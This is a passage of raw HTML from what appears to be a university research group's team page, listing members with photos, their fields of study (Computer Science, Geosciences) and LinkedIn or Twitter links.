0-17.578-5.859-26.367-11.719-5.859-8.789-11.719-17.578-11.719-26.367v-577.148c0-49.805-8.789-87.891-26.367-114.258zM310.547 313.477c-35.156 35.156-79.102 52.734-128.906 52.734s-93.75-17.578-128.906-52.734c-35.156-35.156-52.734-76.172-52.734-128.906 0-49.805 17.578-90.82 52.734-125.977s79.102-55.664 128.906-55.664c49.805 0 93.75 20.508 128.906 55.664s52.734 76.172 52.734 125.977c0 52.734-17.578 93.75-52.734 128.906zM354.492 512.695v946.289c0 8.789-5.859 17.578-11.719 26.367-8.789 5.859-17.578 11.719-26.367 11.719h-269.531c-8.789 0-17.578-5.859-26.367-11.719-5.859-8.789-11.719-17.578-11.719-26.367v-946.289c0-8.789 5.859-17.578 11.719-26.367 8.789-5.859 17.578-11.719 26.367-11.719h269.531c8.789 0 17.578 5.859 26.367 11.719 5.859 8.789 11.719 17.578 11.719 26.367z\"></path>\n                            </svg>\n                          </div>\n                        </div>\n                      </a>\n                    </div>\n                  </div>\n                </div>\n              </div>\n            </div>\n          </div>\n          <div class=\"h-column h-column-container d-flex h-col-lg-3 h-col-md-6 h-col-12 style-912-outer style-local-182-c153-outer\">\n            <div data-colibri-id=\"182-c153\" class=\"d-flex h-flex-basis h-column__inner h-px-lg-0 h-px-md-0 h-px-0 v-inner-lg-0 v-inner-md-0 v-inner-0 style-912 style-local-182-c153 position-relative\">\n              <!---->\n              <!---->\n              <div class=\"w-100 h-y-container h-column__content h-column__v-align flex-basis-100 align-self-lg-start align-self-md-start align-self-start\">\n                <!---->\n                <div data-colibri-id=\"182-c154\" class=\"d-block style-920 style-local-182-c154 position-relative h-element\">\n                  <!---->\n                  <div class=\"h-image__frame-container-outer\">\n                    <div class=\"h-image__frame-container\">\n                      <!---->\n                      <!---->\n                      <img src=\"https://gsudice.dataconn.net/wp-content/uploads/2022/03/cropped-Alex.jpg\" class=\"wp-image-884 style-920-image style-local-182-c154-image\">\n                      <div class=\"h-image__frame h-hide-lg h-hide-md h-hide-sm style-920-frameImage style-local-182-c154-frameImage\"></div>\n                    </div>\n                  </div>\n                </div>\n                <div data-colibri-id=\"182-c155\" class=\"h-global-transition-all h-heading style-914 style-local-182-c155 position-relative h-element\">\n                  <!---->\n                  <div class=\"h-heading__outer style-914 style-local-182-c155\">\n                    <!---->\n                    <!---->\n                    <h4 class=\"\">Alex Asige</h4>\n                  </div>\n                </div>\n                <div data-colibri-id=\"182-c156\" class=\"h-text h-text-component style-915 style-local-182-c156 position-relative h-element\">\n                  <!---->\n                  <!---->\n                  <div class=\"\">\n                    <p>Geosciences\n                      <br>\n                    </p>\n                  </div>\n                </div>\n                <div data-colibri-id=\"182-c157\" class=\"style-921 style-local-182-c157 position-relative h-element\">\n                  <!---->\n                  <div class=\"d-flex flex-wrap h-social-icons justify-content-lg-center justify-content-md-center justify-content-center\">\n                    <div class=\"social-icon-container d-inline-flex\">\n                      <a href=\"https://twitter.com/i/flow/login?redirect_after_login=%2FAsigeAlex\" h-use-smooth-scroll=\"true\">\n                        <div class=\"icon-container h-social-icon h-global-transition\">\n                          <div class=\"h-icon-svg\" style=\"width: 100%; height: 100%;\">\n                            <!--Icon by Socicon (http://www.socicon.com)-->\n                            <svg version=\"1.1\" xmlns=\"http://www.w3.org/2000/svg\" viewBox=\"0 0 1500 1500\">\n\n                              <path d=\"M1347.656 445.313c0 11.719 0 26.367 0 38.086 0 407.227-310.547 875.977-875.977 875.977-172.852 0-336.914-49.805-471.68-137.695 23.438 2.93 49.805 2.93 73.242 2.93 143.555 0 278.32-46.875 383.789-131.836-134.766 0-249.023-90.82-290.039-213.867 20.508 5.859 38.086 5.859 58.594 5.859 29.297 0 55.664-2.93 82.031-8.789-140.625-29.297-246.094-155.273-246.094-301.758 0-2.93 0-2.93 0-5.859 41.016 23.438 87.891 38.086 137.695 38.086-82.031-52.734-137.695-149.414-137.695-254.883 0-55.664 17.578-108.398 43.945-155.273 149.414 187.5 377.93 310.547 632.813 322.266-5.859-23.438-8.789-46.875-8.789-70.313 0-169.922 137.695-307.617 307.617-307.617 90.82 0 169.922 38.086 225.586 96.68 70.313-14.648 137.695-38.086 196.289-73.242-23.438 70.313-73.242 131.836-134.766 169.922 61.523-8.789 120.117-23.438 175.781-49.805-41.016 61.523-93.75 117.188-152.344 161.133z\"></path>\n                            </svg>\n                          </div>\n                        </div>\n                      </a>\n                    </div>\n                  </div>\n                </div>\n              </div>\n            </div>\n          </div>\n          <div class=\"h-column h-column-container d-flex h-col-lg-3 h-col-md-6 h-col-12 style-912-outer style-local-182-c158-outer\">\n            <div data-colibri-id=\"182-c158\" class=\"d-flex h-flex-basis h-column__inner h-px-lg-0 h-px-md-0 h-px-0 v-inner-lg-0 v-inner-md-0 v-inner-0 style-912 style-local-182-c158 position-relative\">\n              <!---->\n              <!---->\n              <div class=\"w-100 h-y-container h-column__content h-column__v-align flex-basis-100 align-self-lg-start align-self-md-start align-self-start\">\n                <!---->\n                <div data-colibri-id=\"182-c159\" class=\"d-block style-922 style-local-182-c159 position-relative h-element\">\n                  <!---->\n                  <div class=\"h-image__frame-container-outer\">\n                    <div class=\"h-image__frame-container\">\n                      <!---->\n                      <!---->\n                      <img src=\"https://gsudice.dataconn.net/wp-content/uploads/2022/03/cropped-Bhavya-scaled-1.jpg\" class=\"wp-image-776 style-922-image style-local-182-c159-image\">\n                      <div class=\"h-image__frame h-hide-lg h-hide-md h-hide-sm style-922-frameImage style-local-182-c159-frameImage\"></div>\n                    </div>\n                  </div>\n                </div>\n                <div data-colibri-id=\"182-c160\" class=\"h-global-transition-all h-heading style-914 style-local-182-c160 position-relative h-element\">\n                  <!---->\n                  <div class=\"h-heading__outer style-914 style-local-182-c160\">\n                    <!---->\n                    <!---->\n                    <h4 class=\"\">Bhavya Busireddy</h4>\n                  </div>\n                </div>\n                <div data-colibri-id=\"182-c161\" class=\"h-text h-text-component style-915 style-local-182-c161 position-relative h-element\">\n                  <!---->\n                  <!---->\n                  <div class=\"\">\n                    <p><span style=\"font-weight: 400; font-size: 16px; font-family: Open Sans; color: rgb(64, 85, 169);\">Computer Science</span></p>\n                  </div>\n                </div>\n                <div data-colibri-id=\"182-c162\" class=\"style-923 style-local-182-c162 position-relative h-element\">\n                  <!---->\n                  <div class=\"d-flex flex-wrap h-social-icons justify-content-lg-center justify-content-md-center justify-content-center\">\n                    <div class=\"social-icon-container d-inline-flex\">\n                      <a href=\"https://www.linkedin.com/in/bhavya-busireddy-b052b192/\" h-use-smooth-scroll=\"true\">\n                        <div class=\"icon-container h-social-icon h-global-transition\">\n                          <div class=\"h-icon-svg\" style=\"width: 100%; height: 100%;\">\n                            <!--Icon by Socicon (http://www.socicon.com)-->\n                            <svg version=\"1.1\" xmlns=\"http://www.w3.org/2000/svg\" viewBox=\"0 0 1500 1500\">\n\n                              <path d=\"M1122.070 767.578c-20.508-23.438-55.664-35.156-105.469-35.156-64.453 0-108.398 20.508-134.766 55.664-26.367 38.086-38.086 90.82-38.086 158.203v512.695c0 8.789-2.93 17.578-11.719 26.367-5.859 5.859-17.578 11.719-26.367 11.719h-269.531c-8.789 0-17.578-5.859-26.367-11.719-5.859-8.789-11.719-17.578-11.719-26.367v-946.289c0-8.789 5.859-17.578 11.719-26.367 8.789-5.859 17.578-11.719 26.367-11.719h260.742c8.789 0 17.578 2.93 23.438 5.859s8.789 11.719 11.719 20.508c0 8.789 2.93 17.578 2.93 20.508s0 11.719 0 23.438c67.383-64.453 158.203-93.75 266.602-93.75 125.977 0 222.656 29.297 292.969 90.82 70.313 64.453 105.469 155.273 105.469 278.32v638.672c0 8.789-2.93 17.578-11.719 26.367-5.859 5.859-17.578 11.719-26.367 11.719h-275.391c-8.789 0-17.578-5.859-26.367-11.719-5.859-8.789-11.719-17.578-11.719-26.367v-577.148c0-49.805-8.789-87.891-26.367-114.258zM310.547 313.477c-35.156 35.156-79.102 52.734-128.906 52.734s-93.75-17.578-128.906-52.734c-35.156-35.156-52.734-76.172-52.734-128.906 0-49.805 17.578-90.82 52.734-125.977s79.102-55.664 128.906-55.664c49.805 0 93.75 20.508 128.906 55.664s52.734 76.172 52.734 125.977c0 52.734-17.578 93.75-52.734 128.906zM354.492 512.695v946.289c0 8.789-5.859 17.578-11.719 26.367-8.789 5.859-17.578 11.719-26.367 11.719h-269.531c-8.789 0-17.578-5.859-26.367-11.719-5.859-8.789-11.719-17.578-11.719-26.367v-946.289c0-8.789 5.859-17.578 11.719-26.367 8.789-5.859 17.578-11.719 26.367-11.719h269.531c8.789 0 17.578 5.859 26.367 11.719 5.859 8.789 11.719 17.578 11.719 26.367z\"></path>\n                            </svg>\n                          </div>\n                        </div>\n                      </a>\n                    </div>\n                  </div>\n                </div>\n              </div>\n            </div>\n          </div>\n          <div class=\"h-column h-column-container d-flex h-col-lg-3 h-col-md-6 h-col-12 style-912-outer style-local-182-c163-outer\">\n            <div data-colibri-id=\"182-c163\" class=\"d-flex h-flex-basis h-column__inner h-px-lg-0 h-px-md-0 h-px-0 v-inner-lg-0 v-inner-md-0 v-inner-0 style-912 style-local-182-c163 position-relative\">\n              <!---->\n              <!---->\n              <div class=\"w-100 h-y-container h-column__content h-column__v-align flex-basis-100 align-self-lg-start align-self-md-start align-self-start\">\n                <!---->\n                <div data-colibri-id=\"182-c164\" class=\"d-block style-913 style-local-182-c164 position-relative h-element\">\n                  <!---->\n                  <div class=\"h-image__frame-container-outer\">\n                    <div class=\"h-image__frame-container\">\n                      <!---->\n                      <!---->\n                      <img src=\"https://gsudice.dataconn.net/wp-content/uploads/2022/03/cropped-Vineeth.jpg\" class=\"wp-image-831 style-913-image style-local-182-c164-image\">\n                      <div class=\"h-image__frame h-hide-lg h-hide-md h-hide-sm style-913-frameImage style-local-182-c164-frameImage\"></div>\n                    </div>\n                  </div>\n                </div>\n                <div data-colibri-id=\"182-c165\" class=\"h-global-transition-all h-heading style-914 style-local-182-c165 position-relative h-element\">\n                  <!---->\n                  <div class=\"h-heading__outer style-914 style-local-182-c165\">\n                    <!---->\n                    <!---->\n                    <h4 class=\"\">Vineeth Kumar Chandha</h4>\n                  </div>\n                </div>\n                <div data-colibri-id=\"182-c166\" class=\"h-text h-text-component style-915 style-local-182-c166 position-relative h-element\">\n                  <!---->\n                  <!---->\n                  <div class=\"\">\n                    <p>Computer Science\n                      <br>\n                    </p>\n                  </div>\n                </div>\n                <div data-colibri-id=\"182-c167\" class=\"style-917 style-local-182-c167 position-relative h-element\">\n                  <!---->\n                  <div class=\"d-flex flex-wrap h-social-icons justify-content-lg-center justify-content-md-center justify-content-center\">\n                    <div class=\"social-icon-container d-inline-flex\">\n                      <a href=\"https://www.linkedin.com/in/vineeth-kumar-chandha-207611149/\" h-use-smooth-scroll=\"true\">\n                        <div class=\"icon-container h-social-icon h-global-transition\">\n                          <div class=\"h-icon-svg\" style=\"width: 100%; height: 100%;\">\n                            <!--Icon by Socicon (http://www.socicon.com)-->\n                            <svg version=\"1.1\" xmlns=\"http://www.w3.org/2000/svg\" viewBox=\"0 0 1500 1500\">\n\n                              <path d=\"M1122.070 767.578c-20.508-23.438-55.664-35.156-105.469-35.156-64.453 0-108.398 20.508-134.766 55.664-26.367 38.086-38.086 90.82-38.086 158.203v512.695c0 8.789-2.93 17.578-11.719 26.367-5.859 5.859-17.578 11.719-26.367 11.719h-269.531c-8.789 0-17.578-5.859-26.367-11.719-5.859-8.789-11.719-17.578-11.719-26.367v-946.289c0-8.789 5.859-17.578 11.719-26.367 8.789-5.859 17.578-11.719 26.367-11.719h260.742c8.789 0 17.578 2.93 23.438 5.859s8.789 11.719 11.719 20.508c0 8.789 2.93 17.578 2.93 20.508s0 11.719 0 23.438c67.383-64.453 158.203-93.75 266.602-93.75 125.977 0 222.656 29.297 292.969 90.82 70.313 64.453 105.469 155.273 105.469 278.32v638.672c0 8.789-2.93 17.578-11.719 26.367-5.859 5.859-17.578 11.719-26.367 11.719h-275.391c-8.789 0-17.578-5.859-26.367-11.719-5.859-8.789-11.719-17.578-11.719-26.367v-577.148c0-49.805-8.789-87.891-26.367-114.258zM310.547 313.477c-35.156 35.156-79.102 52.734-128.906 52.734s-93.75-17.578-128.906-52.734c-35.156-35.156-52.734-76.172-52.734-128.906 0-49.805 17.578-90.82 52.734-125.977s79.102-55.664 128.906-55.664c49.805 0 93.75 20.508 128.906 55.664s52.734 76.172 52.734 125.977c0 52.734-17.578 93.75-52.734 128.906zM354.492 512.695v946.289c0 8.789-5.859 17.578-11.719 26.367-8.789 5.859-17.578 11.719-26.367 11.719h-269.531c-8.789 0-17.578-5.859-26.367-11.719-5.859-8.789-11.719-17.578-11.719-26.367v-946.289c0-8.789 5.859-17.578 11.719-26.367 8.789-5.859 17.578-11.719 26.367-11.719h269.531c8.789 0 17.578 5.859 26.367 11.719 5.859 8.789 11.719 17.578 11.719 26.367z\"></path>\n                            </svg>\n                          </div>\n                        </div>\n                      </a>\n                    </div>\n                  </div>\n                </div>\n              </div>\n            </div>\n          </div>\n          <div class=\"h-column h-column-container d-flex h-col-lg-3 h-col-md-6 h-col-12 style-912-outer style-local-182-c168-outer\">\n            <div data-colibri-id=\"182-c168\" class=\"d-flex h-flex-basis h-column__inner h-px-lg-0 h-px-md-0 h-px-0 v-inner-lg-0 v-inner-md-0 v-inner-0 style-912 style-local-182-c168 position-relative\">\n              <!---->\n              <!---->\n              <div class=\"w-100 h-y-container h-column__content h-column__v-align flex-basis-100 align-self-lg-start align-self-md-start align-self-start\">\n                <!---->\n                <div data-colibri-id=\"182-c169\" class=\"d-block style-913 style-local-182-c169 position-relative h-element\">\n                  <!---->\n                  <div class=\"h-image__frame-container-outer\">\n                    <div class=\"h-image__frame-container\">\n                      <!---->\n                      <!---->\n                      <img src=\"https://gsudice.dataconn.net/wp-content/uploads/2022/04/cropped-sathwik-2-scaled-1.jpg\" class=\"wp-image-1007 style-913-image style-local-182-c169-image\">\n                      <div class=\"h-image__frame h-hide-lg h-hide-md h-hide-sm style-913-frameImage style-local-182-c169-frameImage\"></div>\n                    </div>\n                  </div>\n                </div>\n                <div data-colibri-id=\"182-c170\" class=\"h-global-transition-all h-heading style-914 style-local-182-c170 position-relative h-element\">\n                  <!---->\n                  <div class=\"h-heading__outer style-914 style-local-182-c170\">\n                    <!---->\n                    <!---->\n                    <h4 class=\"\">Sathwik Chowda</h4>\n                  </div>\n                </div>\n                <div data-colibri-id=\"182-c171\" class=\"h-text h-text-component style-915 style-local-182-c171 position-relative h-element\">\n                  <!---->\n                  <!---->\n                  <div class=\"\">\n                    <p><span style=\"font-weight: 400; font-size: 16px; font-family: Open Sans; color: rgb(64, 85, 169);\">Computer Science</span></p>\n                  </div>\n                </div>\n                <div data-colibri-id=\"182-c172\" class=\"style-917 style-local-182-c172 position-relative h-element\">\n                  <!---->\n                  <div class=\"d-flex flex-wrap h-social-icons justify-content-lg-center justify-content-md-center justify-content-center\">\n                    <div class=\"social-icon-container d-inline-flex\">\n                      <a href=\"https://www.linkedin.com/in/sathwikchowda/\" h-use-smooth-scroll=\"true\">\n                        <div class=\"icon-container h-social-icon h-global-transition\">\n                          <div class=\"h-icon-svg\" style=\"width: 100%; height: 100%;\">\n                            <!--Icon by Socicon (http://www.socicon.com)-->\n                            <svg version=\"1.1\" xmlns=\"http://www.w3.org/2000/svg\" viewBox=\"0 0 1500 1500\">\n\n                              <path d=\"M1122.070 767.578c-20.508-23.438-55.664-35.156-105.469-35.156-64.453 0-108.398 20.508-134.766 55.664-26.367 38.086-38.086 90.82-38.086 158.203v512.695c0 8.789-2.93 17.578-11.719 26.367-5.859 5.859-17.578 11.719-26.367 11.719h-269.531c-8.789 0-17.578-5.859-26.367-11.719-5.859-8.789-11.719-17.578-11.719-26.367v-946.289c0-8.789 5.859-17.578 11.719-26.367 8.789-5.859 17.578-11.719 26.367-11.719h260.742c8.789 0 17.578 2.93 23.438 5.859s8.789 11.719 11.719 20.508c0 8.789 2.93 17.578 2.93 20.508s0 11.719 0 23.438c67.383-64.453 158.203-93.75 266.602-93.75 125.977 0 222.656 29.297 292.969 90.82 70.313 64.453 105.469 155.273 105.469 278.32v638.672c0 8.789-2.93 17.578-11.719 26.367-5.859 5.859-17.578 11.719-26.367 11.719h-275.391c-8.789 0-17.578-5.859-26.367-11.719-5.859-8.789-11.719-17.578-11.719-26.367v-577.148c0-49.805-8.789-87.891-26.367-114.258zM310.547 313.477c-35.156 35.156-79.102 52.734-128.906 52.734s-93.75-17.578-128.906-52.734c-35.156-35.156-52.734-76.172-52.734-128.906 0-49.805 17.578-90.82 52.734-125.977s79.102-55.664 128.906-55.664c49.805 0 93.75 20.508 128.906 55.664s52.734 76.172 52.734 125.977c0 52.734-17.578 93.75-52.734 128.906zM354.492 512.695v946.289c0 8.789-5.859 17.578-11.719 26.367-8.789 5.859-17.578 11.719-26.367 11.719h-269.531c-8.789 0-17.578-5.859-26.367-11.719-5.859-8.789-11.719-17.578-11.719-26.367v-946.289c0-8.789 5.859-17.578 11.719-26.367 8.789-5.859 17.578-11.719 26.367-11.719h269.531c8.789 0 17.578 5.859 26.367 11.719 5.859 8.789 11.719 17.578 11.719 26.367z\"></path>\n                            </svg>\n                          </div>\n                        </div>\n                      </a>\n                    </div>\n                  </div>\n                </div>\n              </div>\n            </div>\n          </div>\n          <div class=\"h-column h-column-container d-flex h-col-lg-3 h-col-md-6 h-col-12 style-912-outer style-local-182-c173-outer\">\n            <div data-colibri-id=\"182-c173\" class=\"d-flex h-flex-basis h-column__inner h-px-lg-0 h-px-md-0 h-px-0 v-inner-lg-0 v-inner-md-0 v-inner-0 style-912 style-local-182-c173 position-relative\">\n              <!---->\n              <!---->\n              <div class=\"w-100 h-y-container h-column__content h-column__v-align flex-basis-100 align-self-lg-start align-self-md-start align-self-start\">\n                <!---->\n                <div data-colibri-id=\"182-c174\" class=\"d-block style-913 style-local-182-c174 position-relative h-element\">\n                  <!---->\n                  <div class=\"h-image__frame-container-outer\">\n                    <div class=\"h-image__frame-container\">\n                      <!---->\n                      <!---->\n                      <img src=\"https://gsudice.dataconn.net/wp-content/uploads/2022/03/cropped-Brindal-1.jpeg\" class=\"wp-image-1599 style-913-image style-local-182-c174-image\">\n                      <div class=\"h-image__frame h-hide-lg h-hide-md h-hide-sm style-913-frameImage style-local-182-c174-frameImage\"></div>\n                    </div>\n                  </div>\n                </div>\n                <div data-colibri-id=\"182-c175\" class=\"h-global-transition-all h-heading style-914 style-local-182-c175 position-relative h-element\">\n                  <!---->\n                  <div class=\"h-heading__outer style-914 style-local-182-c175\">\n                    <!---->\n                    <!---->\n                    <h4 class=\"\">Brindal Dhol</h4>\n                  </div>\n                </div>\n                <div data-colibri-id=\"182-c176\" class=\"h-text h-text-component style-915 style-local-182-c176 position-relative h-element\">\n                  <!---->\n                  <!---->\n                  <div class=\"\">\n                    <p>Computer Science\n                      <br>\n                    </p>\n                  </div>\n                </div>\n                <div data-colibri-id=\"182-c177\" class=\"style-917 style-local-182-c177 position-relative h-element\">\n                  <!---->\n                  <div class=\"d-flex flex-wrap h-social-icons justify-content-lg-center justify-content-md-center justify-content-center\">\n                    <div class=\"social-icon-container d-inline-flex\">\n                      <a href=\"https://www.linkedin.com/in/brindaldhol/\" h-use-smooth-scroll=\"true\">\n                        <div class=\"icon-container h-social-icon h-global-transition\">\n                          <div class=\"h-icon-svg\" style=\"width: 100%; height: 100%;\">\n                            <!--Icon by Socicon (http://www.socicon.com)-->\n                            <svg version=\"1.1\" xmlns=\"http://www.w3.org/2000/svg\" viewBox=\"0 0 1500 1500\">\n\n                              <path d=\"M1122.070 767.578c-20.508-23.438-55.664-35.156-105.469-35.156-64.453 0-108.398 20.508-134.766 55.664-26.367 38.086-38.086 90.82-38.086 158.203v512.695c0 8.789-2.93 17.578-11.719 26.367-5.859 5.859-17.578 11.719-26.367 11.719h-269.531c-8.789 0-17.578-5.859-26.367-11.719-5.859-8.789-11.719-17.578-11.719-26.367v-946.289c0-8.789 5.859-17.578 11.719-26.367 8.789-5.859 17.578-11.719 26.367-11.719h260.742c8.789 0 17.578 2.93 23.438 5.859s8.789 11.719 11.719 20.508c0 8.789 2.93 17.578 2.93 20.508s0 11.719 0 23.438c67.383-64.453 158.203-93.75 266.602-93.75 125.977 0 222.656 29.297 292.969 90.82 70.313 64.453 105.469 155.273 105.469 278.32v638.672c0 8.789-2.93 17.578-11.719 26.367-5.859 5.859-17.578 11.719-26.367 11.719h-275.391c-8.789 0-17.578-5.859-26.367-11.719-5.859-8.789-11.719-17.578-11.719-26.367v-577.148c0-49.805-8.789-87.891-26.367-114.258zM310.547 313.477c-35.156 35.156-79.102 52.734-128.906 52.734s-93.75-17.578-128.906-52.734c-35.156-35.156-52.734-76.172-52.734-128.906 0-49.805 17.578-90.82 52.734-125.977s79.102-55.664 128.906-55.664c49.805 0 93.75 20.508 128.906 55.664s52.734 76.172 52.734 125.977c0 52.734-17.578 93.75-52.734 128.906zM354.492 512.695v946.289c0 8.789-5.859 17.578-11.719 26.367-8.789 5.859-17.578 11.719-26.367 11.719h-269.531c-8.789 0-17.578-5.859-26.367-11.719-5.859-8.789-11.719-17.578-11.719-26.367v-946.289c0-8.789 5.859-17.578 11.719-26.367 8.789-5.859 17.578-11.719 26.367-11.719h269.531c8.789 0 17.578 5.859 26.367 11.719 5.859 8.789 11.719 17.578 11.719 26.367z\"></path>\n                            </svg>\n                          </div>\n                        </div>\n                      </a>\n                    </div>\n                  </div>\n                </div>\n              </div>\n            </div>\n          </div>\n          <div class=\"h-column h-column-container d-flex h-col-lg-3 h-col-md-6 h-col-12 style-912-outer style-local-182-c178-outer\">\n            <div data-colibri-id=\"182-c178\" class=\"d-flex h-flex-basis h-column__inner h-px-lg-0 h-px-md-0 h-px-0 v-inner-lg-0 v-inner-md-0 v-inner-0 style-912 style-local-182-c178 position-relative\">\n              <!---->\n              <!---->\n              <div class=\"w-100 h-y-container h-column__content h-column__v-align flex-basis-100 align-self-lg-start align-self-md-start align-self-start\">\n                <!---->\n                <div data-colibri-id=\"182-c179\" class=\"d-block style-913 style-local-182-c179 position-relative h-element\">\n                  <!---->\n                  <div class=\"h-image__frame-container-outer\">\n                    <div class=\"h-image__frame-container\">\n                      <!---->\n                      <!---->\n                      <img src=\"https://gsudice.dataconn.net/wp-content/uploads/2022/03/cropped-ruby_parcells-scaled-1.jpg\" class=\"wp-image-853 style-913-image style-local-182-c179-image\">\n                      <div class=\"h-image__frame h-hide-lg h-hide-md h-hide-sm style-913-frameImage style-local-182-c179-frameImage\"></div>\n                    </div>\n                  </div>\n                </div>\n                <div data-colibri-id=\"182-c180\" class=\"h-global-transition-all h-heading style-914 style-local-182-c180 position-relative h-element\">\n                  <!---->\n                  <div class=\"h-heading__outer style-914 style-local-182-c180\">\n                    <!---->\n                    <!---->\n                    <h4 class=\"\">Ruby Parcells</h4>\n                  </div>\n                </div>\n                <div data-colibri-id=\"182-c181\" class=\"h-text h-text-component style-915 style-local-182-c181 position-relative h-element\">\n                  <!---->\n                  <!---->\n                  <div class=\"\">\n                    <p>Geosciences\n                      <br>\n                    </p>\n                  </div>\n                </div>\n              </div>\n            </div>\n          </div>\n          <div class=\"h-column h-column-container d-flex h-col-lg-3 h-col-md-6 h-col-12 style-912-outer style-local-182-c182-outer\">\n            <div data-colibri-id=\"182-c182\" class=\"d-flex h-flex-basis h-column__inner h-px-lg-0 h-px-md-0 h-px-0 v-inner-lg-0 v-inner-md-0 v-inner-0 style-912 style-local-182-c182 position-relative\">\n              <!---->\n              <!---->\n              <div class=\"w-100 h-y-container h-column__content h-column__v-align flex-basis-100 align-self-lg-start align-self-md-start align-self-start\">\n                <!---->\n                <div data-colibri-id=\"182-c183\" class=\"d-block style-913 style-local-182-c183 position-relative h-element\">\n                  <!---->\n                  <div class=\"h-image__frame-container-outer\">\n                    <div class=\"h-image__frame-container\">\n                      <!---->\n                      <!---->\n                      <img src=\"https://gsudice.dataconn.net/wp-content/uploads/2022/03/cropped-Reshmanjali-1.jpeg\" class=\"wp-image-1600 style-913-image style-local-182-c183-image\">\n                      <div class=\"h-image__frame h-hide-lg h-hide-md h-hide-sm style-913-frameImage style-local-182-c183-frameImage\"></div>\n                    </div>\n                  </div>\n                </div>\n                <div data-colibri-id=\"182-c184\" class=\"h-global-transition-all h-heading style-914 style-local-182-c184 position-relative h-element\">\n                  <!---->\n                  <div class=\"h-heading__outer style-914 style-local-182-c184\">\n                    <!---->\n                    <!---->\n                    <h4 class=\"\">Sai Reshmanjali</h4>\n                  </div>\n                </div>\n                <div data-colibri-id=\"182-c185\" class=\"h-text h-text-component style-915 style-local-182-c185 position-relative h-element\">\n                  <!---->\n                  <!---->\n                  <div class=\"\">\n                    <p><span style=\"font-weight: 400; font-size: 16px; font-family: Open Sans; color: rgb(64, 85, 169);\">Computer Science</span></p>\n                  </div>\n                </div>\n                <div data-colibri-id=\"182-c186\" class=\"style-917 style-local-182-c186 position-relative h-element\">\n                  <!---->\n                  <div class=\"d-flex flex-wrap h-social-icons justify-content-lg-center justify-content-md-center justify-content-center\">\n                    <div class=\"social-icon-container d-inline-flex\">\n                      <a href=\"https://www.linkedin.com/in/reshmanjali-guntupalli/\" h-use-smooth-scroll=\"true\">\n                        <div class=\"icon-container h-social-icon h-global-transition\">\n                          <div class=\"h-icon-svg\" style=\"width: 100%; height: 100%;\">\n                            <!--Icon by Socicon (http://www.socicon.com)-->\n                            <svg version=\"1.1\" xmlns=\"http://www.w3.org/2000/svg\" viewBox=\"0 0 1500 1500\">\n\n                              <path d=\"M1122.070 767.578c-20.508-23.438-55.664-35.156-105.469-35.156-64.453 0-108.398 20.508-134.766 55.664-26.367 38.086-38.086 90.82-38.086 158.203v512.695c0 8.789-2.93 17.578-11.719 26.367-5.859 5.859-17.578 11.719-26.367 11.719h-269.531c-8.789 0-17.578-5.859-26.367-11.719-5.859-8.789-11.719-17.578-11.719-26.367v-946.289c0-8.789 5.859-17.578 11.719-26.367 8.789-5.859 17.578-11.719 26.367-11.719h260.742c8.789 0 17.578 2.93 23.438 5.859s8.789 11.719 11.719 20.508c0 8.789 2.93 17.578 2.93 20.508s0 11.719 0 23.438c67.383-64.453 158.203-93.75 266.602-93.75 125.977 0 222.656 29.297 292.969 90.82 70.313 64.453 105.469 155.273 105.469 278.32v638.672c0 8.789-2.93 17.578-11.719 26.367-5.859 5.859-17.578 11.719-26.367 11.719h-275.391c-8.789 0-17.578-5.859-26.367-11.719-5.859-8.789-11.719-17.578-11.719-26.367v-577.148c0-49.805-8.789-87.891-26.367-114.258zM310.547 313.477c-35.156 35.156-79.102 52.734-128.906 52.734s-93.75-17.578-128.906-52.734c-35.156-35.156-52.734-76.172-52.734-128.906 0-49.805 17.578-90.82 52.734-125.977s79.102-55.664 128.906-55.664c49.805 0 93.75 20.508 128.906 55.664s52.734 76.172 52.734 125.977c0 52.734-17.578 93.75-52.734 128.906zM354.492 512.695v946.289c0 8.789-5.859 17.578-11.719 26.367-8.789 5.859-17.578 11.719-26.367 11.719h-269.531c-8.789 0-17.578-5.859-26.367-11.719-5.859-8.789-11.719-17.578-11.719-26.367v-946.289c0-8.789 5.859-17.578 11.719-26.367 8.789-5.859 17.578-11.719 26.367-11.719h269.531c8.789 0 17.578 5.859 26.367 11.719 5.859 8.789 11.719 17.578 11.719 26.367z\"></path>\n                            </svg>\n                          </div>\n                        </div>\n                      </a>\n                    </div>\n                  </div>\n                </div>\n              </div>\n            </div>\n          </div>\n          <div class=\"h-column h-column-container d-flex h-col-lg-3 h-col-md-6 h-col-12 style-912-outer style-local-182-c187-outer\">\n            <div data-colibri-id=\"182-c187\" class=\"d-flex h-flex-basis h-column__inner h-px-lg-0 h-px-md-0 h-px-0 v-inner-lg-0 v-inner-md-0 v-inner-0 style-912 style-local-182-c187 position-relative\">\n              <!---->\n              <!---->\n              <div class=\"w-100 h-y-container h-column__content h-column__v-align flex-basis-100 align-self-lg-start align-self-md-start align-self-start\">\n                <!---->\n                <div data-colibri-id=\"182-c188\" class=\"d-block style-913 style-local-182-c188 position-relative h-element\">\n                  <!---->\n                  <div class=\"h-image__frame-container-outer\">\n                    <div class=\"h-image__frame-container\">\n                      <!---->\n                      <!---->\n                      <img src=\"https://gsudice.dataconn.net/wp-content/uploads/2022/03/cropped-Bronson.png\" class=\"wp-image-817 style-913-image style-local-182-c188-image\">\n                      <div class=\"h-image__frame h-hide-lg h-hide-md h-hide-sm style-913-frameImage style-local-182-c188-frameImage\"></div>\n                    </div>\n                  </div>\n                </div>\n                <div data-colibri-id=\"182-c189\" class=\"h-global-transition-all h-heading style-914 style-local-182-c189 position-relative h-element\">\n                  <!---->\n                  <div class=\"h-heading__outer style-914 style-local-182-c189\">\n                    <!---->\n                    <!---->\n                    <h4 class=\"\">Bronson Tharpe</h4>\n                  </div>\n                </div>\n                <div data-colibri-id=\"182-c190\" class=\"h-text h-text-component style-915 style-local-182-c190 position-relative h-element\">\n                  <!---->\n                  <!---->\n                  <div class=\"\">\n                    <p>Computer Science</p>\n                  </div>\n                </div>\n                <div data-colibri-id=\"182-c191\" class=\"style-917 style-local-182-c191 position-relative h-element\">\n                  <!---->\n                  <div class=\"d-flex flex-wrap h-social-icons justify-content-lg-center justify-content-md-center justify-content-center\">\n                    <div class=\"social-icon-container d-inline-flex\">\n                      <a href=\"https://www.linkedin.com/in/bronson-tharpe-9b754a1ba/\" h-use-smooth-scroll=\"true\">\n                        <div class=\"icon-container h-social-icon h-global-transition\">\n                          <div class=\"h-icon-svg\" style=\"width: 100%; height: 100%;\">\n                            <!--Icon by Socicon (http://www.socicon.com)-->\n                            <svg version=\"1.1\" xmlns=\"http://www.w3.org/2000/svg\" viewBox=\"0 0 1500 1500\">\n\n                              <path d=\"M1122.070 